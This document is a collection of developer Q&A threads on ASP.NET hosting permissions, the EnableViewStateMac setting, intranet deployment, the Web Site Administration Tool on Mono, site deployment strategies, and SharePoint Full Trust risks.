I'm currently buying webhosting on a shared server with uses IIS6 and ASP.NET2.0 (They advertise 3.5 but investigation on my part has proven this to be false).
I did some legwork to make my 3.5-sensitive ASP.NET apps compile on my hosting then discovered another problem: My apps are failing at 'File.Open()' calls due to no FileIOPermissions.
I've called Technical Support and they've advised me this permission is only available if I configure IIS6 to use .NET 1.1 only. Am I out of line by thinking this is just not good enough?
This is something that should have been nutted out before starting to pay them, unless this disk access is a new requirement.
I can see it from their point of view. Every extra bit of power your apps have gives you more ability to shoot yourself (and more importantly, them) in the foot.
But I don't know why they'd allow it for an earlier .NET version, that seems bizarre.
I would make it clear that this is a deal-breaker. They might recapitulate, or you may have to move elsewhere. Either way, your problem will be solved.
Related
After a lot of reading about EnableViewStateMac and the possibility it will be removed in future .NET Frameworks I still wonder why this is an option to set to false.
I understand you should NEVER set it to false, but who decided it to create the option? And if someone really thought about it, why would one set it to false at all?
Why would you have an option to enable insecurity?
This switch was created long before I joined the ASP.NET team, but I was curious about this myself and spent some time spelunking through the old bug database. As far as I can tell, there are two main reasons it was introduced.
The switch was seen as potentially offering a performance benefit. In an early preview of the .NET Framework (1.0 alpha, really), computing the MAC was indeed slow. This was fixed before 1.0 reached RTM so that the performance difference was negligible. However, the damage was done: the seed was planted in the early developers' minds that there might be some cases where for performance sake the MAC needs to be disabled. This also led to a bunch of MSDN articles which suggested that disabling the MAC improves performance, and I'm still (in 2014!) finding and removing these articles.
In a web farm environment, the <machineKey> needs to be synced. Unfortunately we don't make it easy to generate machine keys securely. So, in the early days of ASP.NET testing, the switch existed to allow testers to do the simple thing for farm deployments rather than the right thing for farm deployments. We're still battling this today, too: most developers use online machine key generators, which are insecure. I'm working with the Visual Studio team to make generating and securing machine keys easier.
At the time, it was believed that the worst possible thing that could happen if the MAC was disabled is that you could XSS the site. This turned out to be an incorrect assessment.
Finally, its removal is no longer just a possibility. It has already been removed in our local source repositories. The next .NET Framework update that we blast out onto the world will have this payload in it, but I don't have timelines for when that might be. We're just sitting on the trigger waiting for the go-ahead. :)
Initially during times of asp the HTML page used to be posted to asp pages which was totally different. This similar coding method is now termed as cross page posting. ViewState is specific to a page so if you try posting an asp.net page to another asp.net page the viewstate would be different. Now in such a situation if you have EnableViewStateMac (which means you want to verify the integrity of viewstate) set the validation would fail and cause an error. So people would disable the viewstatemac so that they can continue to program the old way, and Microsoft continued to provide this feature to have support for the legacy code.
But as you already mentioned this is a huge security risk, opening your application for all kinds of attacks.
platform: ASP.NET 4.5, MVC 4, C#
I'm currently designing a website that's available on the public domain. However, there is a meaningful % of my target market that would be uncomfortable putting some information on a public site, even if it's https etc.
What I'd like to be able to do is allow corporate users use my site, and one way to do that is to allow them to host my website on their intranet. The usual disadvantages are, of course, that they don't get their site updated as fast as the public one would, and it's also a headache for me in terms of support.
My questions are
What are some strategies to make "corporate friendly" deployments easy and hassle-free?
Are there ways I could keep the site public with just the database inside the intranet (can't see how... but then I'm no techno-know-all)
If I have no choice but to make it locally hosted - then what's the best way to do it to keep my development/support overheads at a minimum?
I hope the mods don't lock this. I'm asking for specific methods and technical approaches to a very real problem.
Thank you,
For #1, there's a many facets to the question. A couple thoughts that might help you think it out:
Deploying your app: Make it simple to deploy, and to upgrade, between versions of your application. Try to make it happen as a single operation, not upgrading different parts by hand manually. As Darin Dimitrov mentioned, you could look into a technology like Web Deployment Packages, especially with Visual Studio 2012 which will have incremental database publishing (in VS2010, the database was non-incremental so there wasn't really an "update" story). Keep the cost of deployment down so that they can afford to upgrade more frequently (not the cost of your product, but the overhead of who's getting paid to keep the system updated and running).
Consider differences between running on the Internet and on an Intranet: For example, authentication on the Internet is usually done with forms based authentication. On an intranet, you may want to consider supporting Windows authentication for a seamless login experience for corporate users. This should impact your designs to allow authentication to be modular between your deployments.
Corporate adoption of newer technologies might be slower than you want: You're using the latest and greatest (ASP.NET 4.5/MVC4). Some companies might not be prepared to deploy this now, or for a couple years. Consider if you could use an older, established technology, such as .NET 4 - having been out for a few years, it's already somewhat proven and has adoption.
For your 2nd question, it comes down to what their IT is willing to accommodate. Many corporate sites have the database within a secured LAN, but the web server is accessible from the public Internet. It's certainly a well-understood network design, but depending on the assets involved in your application, your customers may or may not agree to it. This one's a business decision.
For #3 the answer is common to any long term software project. It has to be high quality and maintainable if you want to minimize the hassle.
If you're only going to support the last N versions, make that very clear. Avoid supporting code that you're already fixed long in the past. Consider providing extra support or affordable upgrades to keep your customers on newer (and hopefully better) releases.
Keep in mind what components need to be upgraded between versions. Your web app (obviously), but also your database schema and any dependencies or libraries you're using. This is mostly the same considerations as #1. Make sure you have a good plan for upgrades and rollbacks.
Most importantly, test, test, test. Have functional regression tests and install/upgrade tests, and try out as many possibilities as you can think of.
Answer to only 1) above.
I would recommend a continuous integration tool. We use TeamCity and deploy mvc3 and mvc4 applications to our public as well as privately hosted sites with a click of a button. Previously, we used cruise control, but now we are more satisfied with TeamCity. Read up on them. Might lead you in the right direction.
You may checkout Visual Studio's Web Deployment Packages. They allow you to prepare a package that could directly be installed on your client's web servers.
Does anyone know how to get to work the authentication mechanism configured using Web Site Administration Tool under Linux running Mono? Is it even possible?
I don't think you're going to find a ton of support for this, evidenced by the lack of activity on your question. The Web Site Administration Tool was removed from CodePlex around April 2009 due to inactivity (CodePlex rules state: It must be an ongoing project (no "abandoned" projects)) and it's use/adoption really declined. Many projects that were using it as a component just wrote their own after that.
There have been a few alternatives that have popped up in the community after it went missing:
Rolling Your Own Website Administration Tool
Create Your Own Web Site Administration Tool in ASP.NET
I think using code from one of those two projects is going to come as close to what you're after as is available. It's not ideal and will require some work to get working with the back-ends you desire (both of those use a SQL server back-end). I know this answer sucks, but sometimes that's the answer. I hope someone comes and proves me wrong and that what you want is out there, or at least could provide the WSAT source code as it last was on codeplex...that's be a huge head start in getting it to run.
If you're referring to a different WSAT please comment and correct me....it's such a generic term really, but that was by far the most popular one so I based this answer on that.
You have to set up your database schema manually for Membership/Roles support if using Mono. That said, following the FAQ answer (which I have found very handy in the past) alone may not be enough, I am not sure about the other dependancies for the Web Site Administration Tool itself (e.g. any .NET specific libraries it needs) but combined with an appropriate membership provider configured in system.web I'd say there is a reasonable chance it may.
If that doesn't work for you, I would second Nick's suggestion of taking a look at the solution by 4GuysFromRolla.com who have a lot of good info relevant to both .NET & Mono.
I have looked through the related questions, and none of them have provided me the information I am looking for.
Currently the team I work on does deployments of individual .aspx (and .aspx.vb) files for bug fixes/enhancments. I am trying to affect change, as I really believe that deploying the "whole compiled site" is less error prone. As this is a significant change from the way things have been done, my suggestions have ben met with significant resistance.
As my google-fu has not been up to par lately, I was hoping the SO community could either tell me that I am off my rocker, and that there is nothing wrong with moving individual files, or point me to some really good resources which would allow me to make a stronger case.
Edit:
This has all been great info, and reinforces the arguments that I have already been making, can anyone argue the other side?
Deploying individual files for bug fixes and deployment is not a wise strategy. It sounds like you need a comprehensive build and deployment process. That doesn't mean it has to be complicated as there are some good tools available nowadays.
Build and deployment can get detailed, so as a minimum start try taking a look at the Microsoft Web Deployment Tool (http://www.iis.net/extensions/WebDeploymentTool). Install the tool on your build server and install it on your deployment server. Stage your ASP.NET content locally using the Visual Studio Publish command, then use the above tool to synchronize the entire package on the deployment server. I like this approach because it can be completely automated. When doing builds and deployments, aim for complete automation to reduce potential errors.
This is the bare minimum, but you will at least be certain that when specific files are changed, they are ALL synchronized on the deployment server.
Personally to me rolling back immediately is most important. Again website projects are very hard when it comes to track the changes.
you can find a good detailed comparison here. I am reproducing the article here.
1) Deployment. If you need in-place deployment, this model is perfect. However, it's not recommended since you are exposing your logic in clear text. So, anybody who have access to physical server can mess with your code and you never going to notice this. You can try to make precompiled web site, but you going to end up with a lot of dll and almost untouchable aspx files. Microsoft recognized this limitation and released Web Deployment Project tool.
2) You need to keep track of what did you change locally and what did you upload to production server. There are no versioning control. Visual Studio has Web Copy tool, but this tool fails to help. I had to build my own tool, which kept track of changes based on Visual Source Safe.
3) When you hit F5 for debug execution it takes merely 2 minutes to compile and execute whole project. Of course you can attach debugger to existing thread, but this is not an obvious solution.
4) If you ever try to generate controls on a fly you will hit first unsolvable limitation. How to reference other pages and controls. Page and control compilation happens on a per directory basis. On best case you going to get assembly for each directory, in worst each page or control is going to get its own assembly. If you need to reference another page from a control or another page you need to explicitly import it with the #Reference directive.
So for,
customControl = this.LoadControl("~/Controls/CustomUserControl.ascx") as CustomUserControl;
You need,
But what if you want to add something really dynamically and can't put all appropriate #Reference directives? Or What if you are creating server control and it doesn't have ascx file, so you don't have a place for #Reference ? Since each control has it's own assembly, it's almost impossible to do reflection.
Web Application Projects which re-appeared in Visual Studio 2005 SP1. They solves all issues mentioned above.
1) Deployment. You get just one dll per project. You can created redistributable packages and repeatable builds.You can have versioning and build scripts.
2) If you did code behind change you can upload just one dll. If you did aspx change you can upload just aspx change.
3) Execution takes 2-3 sec maximum.
4) Whole project is in one assembly, which helps reference any page or control. Conclusion. For any kind of serious work you should use Web Application Projects. Special thanks to Rick Strahl for his amazing article Compilation and Deployment in ASP.NET 2.0.
I agree with Rich.
Further information:
Deploying your SOURCE code ala the .vb files to the server is a BAD idea. Compile it. Obfuscate if you can, just don't deploy straight source. Imagine an attacker which gains access to the system. They could easily change your code and you might not ever notice. Yes, you can use a tool like reflector to decompile. But it's really hard to decompile a full site, make the changes you want, and put them back into production.
Deploying a single file might very well cause some type of problem in a related module. I'm guessing you guys don't really do QA. Tell them it's time to grow up.
Compiling your site will reduce JIT (just in time) compilation. Think performance.
I'm also going to guess that pretty much everyone has production server access. This is bad from the company's perspective as you have no controls in place. What happens when an employee decides to cause some havoc before leaving?
What you are describing is inline with Cowboy coding. Sure, it's fun to ride to the rescue but this style frequently blows everything up.
It's bad for rolling back. If you deploy as a web site vs web app, yeah you can do quick patches of one or two files, but what if you ever need to roll back to a previous version? Good luck tracking down all the files that were updated to make the new version. I much prefer the concept of a "version" for organizational reasons, and the compiled web app is much more inline with this than a "website" project.
We had this dilemma and ended up going with the compiled version mainly for the security reasons. If your site is external facing you could be compromising your security by allowing the vb files to be out there in plain text. I realize one could still get your code if they really wanted to but it would be an additional hurdle they would need to go through. If you use Visual Studio as your development environment you can publish the site pre-compiled and check the named assemblies option when publishing and this will essentially create a dll for each aspx page so you can do the one off page changes if necessary. This was a great feature we found as we were constantly updating the whole site and there were times when things would get updated that shouldn't. After using that feature we no longer had updates getting pushed that shouldn't. As far as rolling back I hope your using some type of Source control / versioning system. Team Foundation Server is great for versioning/source control but it is quite pricey.
What is the best deployment strategy depends a lot on what kind of environment you are working in, and what kind of developers you are working with.
Visual artists that started with graphic layout and worked towards programming are much more in tune to individual page generation and release. Also the .aspx.vb files are simply server side scripting, not really programming.
Programmers usually start at the command line and branch out to environments such as the web and understandably feel that good programming practices should be applied too the web, including standard test and release cycles (and compiled code).
If the site is in constant flux the individual pages would make more sense, but if you are required to deliver an installation package to your production group msi files are the way to go, since they can be easily backed out if necessary.
If you evaluate what your groups needs are, which includes the varied experience of everyone in your group, you should be able to convince either yourself or the group. This is not a matter of which is better, but which provides the best business model.
I recently joined a firm and when analyzing their environment I noticed that the SharePoint web.config had the trust level set to Full. I know this is an absolutely terrible practice and was hoping the stackoverflow community could help me outline the flaws in this decision.
Oh, it appears this decision was made to allow the developers to deploy dlls to the Bin folder without creating CAS policies. Sigh.
Just want to clarify and make matters worse, we are also deploying third party code to this web application.
Todd,
The book, "Programming Microsoft ASP.Net 3.5", by Dino Espisito provides some sound reasoning for not allowing Full Trust in ASP.Net applications.
Among other reasons, Dino states that web applications exposed to the internet are "one of the most hostile environments for computer security you can imagine." And:
a publicly exposed fully trusted
application is a potential platform
for hackers to launch attacks. The
less an application is trusted, the
more secure that application happens
to be.
I'm surprised the StackOverflow community did not outline the problem with Full Trust better. I was hoping for the same thing so I didn't have to go digging through my pile of books to find the answer, lazy me.
If they're ignoring the CAS policies, it might be a tough sell to get them to dial it back, since it makes their job a little harder (or, at least, a little less forgiving). Changing security practices is always tough - like when I had to convince my boss that using the SA accounts in the SQL connection string of our web applications was a bad idea - but hang in there.
Full Trust allows the application to escalate to control of any resource on the computer. While you'd have to have a security flaw in your application to allow these, and they'll probably claim that they've prevented any escalations through astute programming, remind them that in the case that something happens, wouldn't they rather the web application didn't have control of the whole computer? I mean, just in case?
EDIT: I was a little overzealous with my language here. Full Trust would allow the application to control whatever it wants, but only if the Application Pool process has sufficient rights to do it. So if you're running as a limited user with no rights on the server except what the applicaition needs, then I suppose there's essentially no risk to "Full Trust". The reality is that the app pool owner most likely has a number of rights you wouldn't want your app to have (and in some cases, many, many more), so it's much safer to limit app security and grant additional rights needs individually to the application. Thanks for the correction, Barry.
Flaws? Many. But the most damning thing is straight out of the CAS utility:
"...it allows full access to your computer's resources such as the file system or network access, potentially operating outside the control of the security system."
That means, code granted Full Trust can execute any other piece of code (managed or otherwise) on the system, can call across the network to any machine, can do anything in the file system (including changing permissions on restricted files - even OS files).
Most web programmers would say "that's not a problem, it's just my code," which is fine.... until a security flaw crops up in their code that allows an attacker to use it to do unsavoury things. Then previously-granted Full Trust becomes quite unfortunate.
I honestly have found sharepoint to be too restrictive.
Take a look at the following page to see what can and cannot be done based on trust levels
http://msdn.microsoft.com/en-us/library/ms916855.aspx
One problem I ran into immediately was I could not use the Caching Application Block. We were using this application block instead of the ASP.NET caching because we had used an MVP pattern and may open up a win forms application.
Another problem is no reflection, this caused the About page to fail because the version number is pulled from the metadata of the assembly.
I think the best solution is to not use Sharepoint as an application host. I would only use Sharepoint as an application host if the amount of coding was so small that it didn't affect the trust level and it would be less work then setting up a new application. If you are doing some type of coding which is starting to hit the walls of the trust level, move your application into a proper ASP.NET enviroment. But that is just me, and I am biased. Maybe you should try to aim for a Medium trust level compromise.
I use full trust on my development machines.. so I can deploy to the BIN when building new code.
I trust my own code and run it in the GAC on production because creating CAS policies is a pain.
The third party thing would have me worried.. however:
Most 3rd party solutions found on the web also deploy to the GAC (assuming for the same reasons). This gives them all rights regardless of trust level.
Feels like it has more to do with if you trust the 3rd parties or not.. and do you really trust your own developers?
What would a hacker do?
The scenario where a hacker drops an evil dll in your BIN folder I don't see as very realistic.. regardless if he can do that he can also probably change the trust level.